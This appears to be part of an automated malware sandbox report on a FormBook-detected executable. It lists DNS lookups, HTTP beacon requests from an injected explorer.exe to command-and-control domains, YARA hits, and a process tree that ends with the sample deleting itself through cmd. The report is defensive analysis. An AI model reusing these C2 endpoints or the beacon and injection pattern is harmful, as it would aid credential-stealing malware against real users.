                                                                May 12, 2021 14:43:54.901154995 CEST5001053192.168.2.68.8.8.8
                                                                May 12, 2021 14:43:55.015284061 CEST53500108.8.8.8192.168.2.6
                                                                May 12, 2021 14:43:55.317168951 CEST6371853192.168.2.68.8.8.8
                                                                May 12, 2021 14:43:55.378597021 CEST53637188.8.8.8192.168.2.6
                                                                May 12, 2021 14:43:55.609453917 CEST6211653192.168.2.68.8.8.8
                                                                May 12, 2021 14:43:55.671864033 CEST53621168.8.8.8192.168.2.6
                                                                May 12, 2021 14:43:56.291462898 CEST6381653192.168.2.68.8.8.8
                                                                May 12, 2021 14:43:56.413023949 CEST53638168.8.8.8192.168.2.6
                                                                May 12, 2021 14:43:57.854007959 CEST5501453192.168.2.68.8.8.8
                                                                May 12, 2021 14:43:57.905849934 CEST53550148.8.8.8192.168.2.6
                                                                May 12, 2021 14:43:58.009041071 CEST6220853192.168.2.68.8.8.8
                                                                May 12, 2021 14:43:58.074162006 CEST53622088.8.8.8192.168.2.6
                                                                May 12, 2021 14:44:01.802985907 CEST5757453192.168.2.68.8.8.8
                                                                May 12, 2021 14:44:01.860528946 CEST53575748.8.8.8192.168.2.6
                                                                May 12, 2021 14:44:02.425599098 CEST5181853192.168.2.68.8.8.8
                                                                May 12, 2021 14:44:02.484363079 CEST53518188.8.8.8192.168.2.6
                                                                May 12, 2021 14:44:02.956604004 CEST5662853192.168.2.68.8.8.8
                                                                May 12, 2021 14:44:03.164084911 CEST53566288.8.8.8192.168.2.6
                                                                May 12, 2021 14:44:03.913177967 CEST6077853192.168.2.68.8.8.8
                                                                May 12, 2021 14:44:03.970308065 CEST53607788.8.8.8192.168.2.6
                                                                May 12, 2021 14:44:04.991370916 CEST5379953192.168.2.68.8.8.8
                                                                May 12, 2021 14:44:05.051984072 CEST53537998.8.8.8192.168.2.6
                                                                May 12, 2021 14:44:06.065033913 CEST5468353192.168.2.68.8.8.8
                                                                May 12, 2021 14:44:06.122181892 CEST53546838.8.8.8192.168.2.6
                                                                May 12, 2021 14:44:12.681934118 CEST5932953192.168.2.68.8.8.8
                                                                May 12, 2021 14:44:12.740622044 CEST53593298.8.8.8192.168.2.6
                                                                May 12, 2021 14:44:17.177454948 CEST6402153192.168.2.68.8.8.8
                                                                May 12, 2021 14:44:17.328610897 CEST53640218.8.8.8192.168.2.6
                                                                May 12, 2021 14:44:23.508150101 CEST5612953192.168.2.68.8.8.8
                                                                May 12, 2021 14:44:23.720913887 CEST53561298.8.8.8192.168.2.6
                                                                May 12, 2021 14:44:39.849184036 CEST5817753192.168.2.68.8.8.8
                                                                May 12, 2021 14:44:39.937792063 CEST53581778.8.8.8192.168.2.6
                                                                May 12, 2021 14:44:42.973548889 CEST5070053192.168.2.68.8.8.8
                                                                May 12, 2021 14:44:43.045808077 CEST53507008.8.8.8192.168.2.6
                                                                May 12, 2021 14:44:45.252249002 CEST5406953192.168.2.68.8.8.8
                                                                May 12, 2021 14:44:45.323209047 CEST53540698.8.8.8192.168.2.6
                                                                May 12, 2021 14:44:47.352068901 CEST6117853192.168.2.68.8.8.8
                                                                May 12, 2021 14:44:47.564670086 CEST53611788.8.8.8192.168.2.6
                                                                May 12, 2021 14:44:49.764441013 CEST5701753192.168.2.68.8.8.8
                                                                May 12, 2021 14:44:49.838244915 CEST53570178.8.8.8192.168.2.6
                                                                May 12, 2021 14:44:55.047101021 CEST5632753192.168.2.68.8.8.8
                                                                May 12, 2021 14:44:55.314804077 CEST53563278.8.8.8192.168.2.6
                                                                May 12, 2021 14:45:00.605317116 CEST5024353192.168.2.68.8.8.8
                                                                May 12, 2021 14:45:00.763115883 CEST53502438.8.8.8192.168.2.6
                                                                May 12, 2021 14:45:06.363883972 CEST6205553192.168.2.68.8.8.8
                                                                May 12, 2021 14:45:06.765923977 CEST53620558.8.8.8192.168.2.6
                                                                May 12, 2021 14:45:11.772507906 CEST6124953192.168.2.68.8.8.8
                                                                May 12, 2021 14:45:11.843046904 CEST53612498.8.8.8192.168.2.6
                                                                May 12, 2021 14:45:17.039460897 CEST6525253192.168.2.68.8.8.8
                                                                May 12, 2021 14:45:17.110006094 CEST53652528.8.8.8192.168.2.6

                                                                DNS Queries

                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                May 12, 2021 14:44:17.177454948 CEST192.168.2.68.8.8.80x9f32Standard query (0)www.servantsheartvalet.comA (IP address)IN (0x0001)
                                                                May 12, 2021 14:44:23.508150101 CEST192.168.2.68.8.8.80xd1eeStandard query (0)www.patricksparber.comA (IP address)IN (0x0001)
                                                                May 12, 2021 14:44:47.352068901 CEST192.168.2.68.8.8.80xef1bStandard query (0)www.patricksparber.comA (IP address)IN (0x0001)
                                                                May 12, 2021 14:44:49.764441013 CEST192.168.2.68.8.8.80x8101Standard query (0)www.m-kenterprises.comA (IP address)IN (0x0001)
                                                                May 12, 2021 14:44:55.047101021 CEST192.168.2.68.8.8.80x719eStandard query (0)www.meucamarimoficial.comA (IP address)IN (0x0001)
                                                                May 12, 2021 14:45:00.605317116 CEST192.168.2.68.8.8.80xbd64Standard query (0)www.bridgestreetresources.comA (IP address)IN (0x0001)
                                                                May 12, 2021 14:45:06.363883972 CEST192.168.2.68.8.8.80x5cfcStandard query (0)www.uuoouu-90.storeA (IP address)IN (0x0001)
                                                                May 12, 2021 14:45:11.772507906 CEST192.168.2.68.8.8.80xcb64Standard query (0)www.shadyshainarae.comA (IP address)IN (0x0001)
                                                                May 12, 2021 14:45:17.039460897 CEST192.168.2.68.8.8.80xe47fStandard query (0)www.sherwooddaydesigns.comA (IP address)IN (0x0001)

                                                                DNS Answers

                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                May 12, 2021 14:44:17.328610897 CEST8.8.8.8192.168.2.60x9f32No error (0)www.servantsheartvalet.comservantsheartvalet.comCNAME (Canonical name)IN (0x0001)
                                                                May 12, 2021 14:44:17.328610897 CEST8.8.8.8192.168.2.60x9f32No error (0)servantsheartvalet.com209.182.202.96A (IP address)IN (0x0001)
                                                                May 12, 2021 14:44:23.720913887 CEST8.8.8.8192.168.2.60xd1eeNo error (0)www.patricksparber.com156.253.106.229A (IP address)IN (0x0001)
                                                                May 12, 2021 14:44:47.564670086 CEST8.8.8.8192.168.2.60xef1bNo error (0)www.patricksparber.com156.253.106.229A (IP address)IN (0x0001)
                                                                May 12, 2021 14:44:49.838244915 CEST8.8.8.8192.168.2.60x8101No error (0)www.m-kenterprises.comm-kenterprises.comCNAME (Canonical name)IN (0x0001)
                                                                May 12, 2021 14:44:49.838244915 CEST8.8.8.8192.168.2.60x8101No error (0)m-kenterprises.com34.102.136.180A (IP address)IN (0x0001)
                                                                May 12, 2021 14:44:55.314804077 CEST8.8.8.8192.168.2.60x719eName error (3)www.meucamarimoficial.comnonenoneA (IP address)IN (0x0001)
                                                                May 12, 2021 14:45:00.763115883 CEST8.8.8.8192.168.2.60xbd64No error (0)www.bridgestreetresources.combridgestreetresources.comCNAME (Canonical name)IN (0x0001)
                                                                May 12, 2021 14:45:00.763115883 CEST8.8.8.8192.168.2.60xbd64No error (0)bridgestreetresources.com66.235.200.147A (IP address)IN (0x0001)
                                                                May 12, 2021 14:45:06.765923977 CEST8.8.8.8192.168.2.60x5cfcName error (3)www.uuoouu-90.storenonenoneA (IP address)IN (0x0001)
                                                                May 12, 2021 14:45:11.843046904 CEST8.8.8.8192.168.2.60xcb64No error (0)www.shadyshainarae.comshadyshainarae.comCNAME (Canonical name)IN (0x0001)
                                                                May 12, 2021 14:45:11.843046904 CEST8.8.8.8192.168.2.60xcb64No error (0)shadyshainarae.com34.102.136.180A (IP address)IN (0x0001)
                                                                May 12, 2021 14:45:17.110006094 CEST8.8.8.8192.168.2.60xe47fNo error (0)www.sherwooddaydesigns.comext-sq.squarespace.comCNAME (Canonical name)IN (0x0001)
                                                                May 12, 2021 14:45:17.110006094 CEST8.8.8.8192.168.2.60xe47fNo error (0)ext-sq.squarespace.com198.185.159.144A (IP address)IN (0x0001)
                                                                May 12, 2021 14:45:17.110006094 CEST8.8.8.8192.168.2.60xe47fNo error (0)ext-sq.squarespace.com198.49.23.145A (IP address)IN (0x0001)
                                                                May 12, 2021 14:45:17.110006094 CEST8.8.8.8192.168.2.60xe47fNo error (0)ext-sq.squarespace.com198.185.159.145A (IP address)IN (0x0001)
                                                                May 12, 2021 14:45:17.110006094 CEST8.8.8.8192.168.2.60xe47fNo error (0)ext-sq.squarespace.com198.49.23.144A (IP address)IN (0x0001)

                                                                HTTP Request Dependency Graph

                                                                • www.servantsheartvalet.com
                                                                • www.m-kenterprises.com
                                                                • www.bridgestreetresources.com
                                                                • www.shadyshainarae.com

                                                                HTTP Packets

                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                0192.168.2.649744209.182.202.9680C:\Windows\explorer.exe
                                                                TimestampkBytes transferredDirectionData
                                                                May 12, 2021 14:44:17.541177988 CEST6237OUTGET /meub/?5jYHTPD=WGLirrwFUtYpDXzpLjvBuZZEIXcS0L/7kvp4uO4ypDpemvycQ/ZH3e36klWLP588DVSUgz18wg==&W2MTZ=5jyDHn6x2rY HTTP/1.1
                                                                Host: www.servantsheartvalet.com
                                                                Connection: close
                                                                Data Raw: 00 00 00 00 00 00 00
                                                                Data Ascii:


                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                1192.168.2.64975234.102.136.18080C:\Windows\explorer.exe
                                                                TimestampkBytes transferredDirectionData
                                                                May 12, 2021 14:44:49.882224083 CEST6280OUTGET /meub/?5jYHTPD=AHOwzMgiYatzzgqEm8fFrRw5FyeBXJPWAn72SIj91D3zxHtkj2kvoxgZPNykIH4K/OrW/jgvcw==&W2MTZ=5jyDHn6x2rY HTTP/1.1
                                                                Host: www.m-kenterprises.com
                                                                Connection: close
                                                                Data Raw: 00 00 00 00 00 00 00
                                                                Data Ascii:
                                                                May 12, 2021 14:44:50.021295071 CEST6281INHTTP/1.1 403 Forbidden
                                                                Server: openresty
                                                                Date: Wed, 12 May 2021 12:44:49 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 275
                                                                ETag: "609953af-113"
                                                                Via: 1.1 google
                                                                Connection: close
                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                2192.168.2.64975366.235.200.14780C:\Windows\explorer.exe
                                                                TimestampkBytes transferredDirectionData
                                                                May 12, 2021 14:45:00.805551052 CEST6282OUTGET /meub/?5jYHTPD=wcKMzz9mAcCi2aLb0t1qtV86GlMNvZH+VyhKA1jT/I4bq+nb0/na/dj3wGs+8qrOUrJA87J5aQ==&W2MTZ=5jyDHn6x2rY HTTP/1.1
                                                                Host: www.bridgestreetresources.com
                                                                Connection: close
                                                                Data Raw: 00 00 00 00 00 00 00
                                                                Data Ascii:


                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                3192.168.2.64975434.102.136.18080C:\Windows\explorer.exe
                                                                TimestampkBytes transferredDirectionData
                                                                May 12, 2021 14:45:11.886488914 CEST6284OUTGET /meub/?5jYHTPD=IF6wwdQ2GC/v5+zeo737nU5N5nLUvdsVBqkfZ3TmK32/J3TLHA8Ym95CSjw9+1sG86DK55WYOQ==&W2MTZ=5jyDHn6x2rY HTTP/1.1
                                                                Host: www.shadyshainarae.com
                                                                Connection: close
                                                                Data Raw: 00 00 00 00 00 00 00
                                                                Data Ascii:
                                                                May 12, 2021 14:45:12.023557901 CEST6284INHTTP/1.1 403 Forbidden
                                                                Server: openresty
                                                                Date: Wed, 12 May 2021 12:45:11 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 275
                                                                ETag: "6096ba97-113"
                                                                Via: 1.1 google
                                                                Connection: close
                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                Code Manipulations

                                                                Statistics

                                                                Behavior

                                                                Click to jump to process

                                                                System Behavior

                                                                General

                                                                Start time:14:43:06
                                                                Start date:12/05/2021
                                                                Path:C:\Users\user\Desktop\PO 367628usa.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:'C:\Users\user\Desktop\PO 367628usa.exe'
                                                                Imagebase:0x4b0000
                                                                File size:846336 bytes
                                                                MD5 hash:42CF4C3943D5A839412A16A4D8B8D65D
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:.Net C# or VB.NET
                                                                Yara matches:
                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.347022763.00000000039F5000.00000004.00000001.sdmp, Author: Joe Security
                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.347022763.00000000039F5000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.347022763.00000000039F5000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.346118335.00000000029F3000.00000004.00000001.sdmp, Author: Joe Security
                                                                Reputation:low

                                                                General

                                                                Start time:14:43:13
                                                                Start date:12/05/2021
                                                                Path:C:\Users\user\Desktop\PO 367628usa.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Users\user\Desktop\PO 367628usa.exe
                                                                Imagebase:0x10000
                                                                File size:846336 bytes
                                                                MD5 hash:42CF4C3943D5A839412A16A4D8B8D65D
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:low

                                                                General

                                                                Start time:14:43:14
                                                                Start date:12/05/2021
                                                                Path:C:\Users\user\Desktop\PO 367628usa.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Users\user\Desktop\PO 367628usa.exe
                                                                Imagebase:0x330000
                                                                File size:846336 bytes
                                                                MD5 hash:42CF4C3943D5A839412A16A4D8B8D65D
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:low

                                                                General

                                                                Start time:14:43:14
                                                                Start date:12/05/2021
                                                                Path:C:\Users\user\Desktop\PO 367628usa.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Users\user\Desktop\PO 367628usa.exe
                                                                Imagebase:0x340000
                                                                File size:846336 bytes
                                                                MD5 hash:42CF4C3943D5A839412A16A4D8B8D65D
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:low

                                                                General

                                                                Start time:14:43:15
                                                                Start date:12/05/2021
                                                                Path:C:\Users\user\Desktop\PO 367628usa.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:C:\Users\user\Desktop\PO 367628usa.exe
                                                                Imagebase:0xdc0000
                                                                File size:846336 bytes
                                                                MD5 hash:42CF4C3943D5A839412A16A4D8B8D65D
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Yara matches:
                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.389944333.0000000001440000.00000040.00000001.sdmp, Author: Joe Security
                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.389944333.0000000001440000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.389944333.0000000001440000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.390287791.0000000001860000.00000040.00000001.sdmp, Author: Joe Security
                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.390287791.0000000001860000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.390287791.0000000001860000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.388446461.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.388446461.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.388446461.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                Reputation:low

                                                                General

                                                                Start time:14:43:20
                                                                Start date:12/05/2021
                                                                Path:C:\Windows\explorer.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:
                                                                Imagebase:0x7ff6f22f0000
                                                                File size:3933184 bytes
                                                                MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high

                                                                General

                                                                Start time:14:43:32
                                                                Start date:12/05/2021
                                                                Path:C:\Windows\SysWOW64\raserver.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:C:\Windows\SysWOW64\raserver.exe
                                                                Imagebase:0x950000
                                                                File size:108544 bytes
                                                                MD5 hash:2AADF65E395BFBD0D9B71D7279C8B5EC
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Yara matches:
                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.588488580.0000000000910000.00000040.00000001.sdmp, Author: Joe Security
                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.588488580.0000000000910000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.588488580.0000000000910000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.589496878.0000000002E40000.00000040.00000001.sdmp, Author: Joe Security
                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.589496878.0000000002E40000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.589496878.0000000002E40000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.589661592.0000000002E70000.00000004.00000001.sdmp, Author: Joe Security
                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.589661592.0000000002E70000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.589661592.0000000002E70000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                Reputation:moderate

                                                                General

                                                                Start time:14:43:37
                                                                Start date:12/05/2021
                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:/c del 'C:\Users\user\Desktop\PO 367628usa.exe'
                                                                Imagebase:0x2a0000
                                                                File size:232960 bytes
                                                                MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high

                                                                General

                                                                Start time:14:43:37
                                                                Start date:12/05/2021
                                                                Path:C:\Windows\System32\conhost.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                Imagebase:0x7ff61de10000
                                                                File size:625664 bytes
                                                                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high

                                                                Disassembly

                                                                Code Analysis

                                                                Reset < >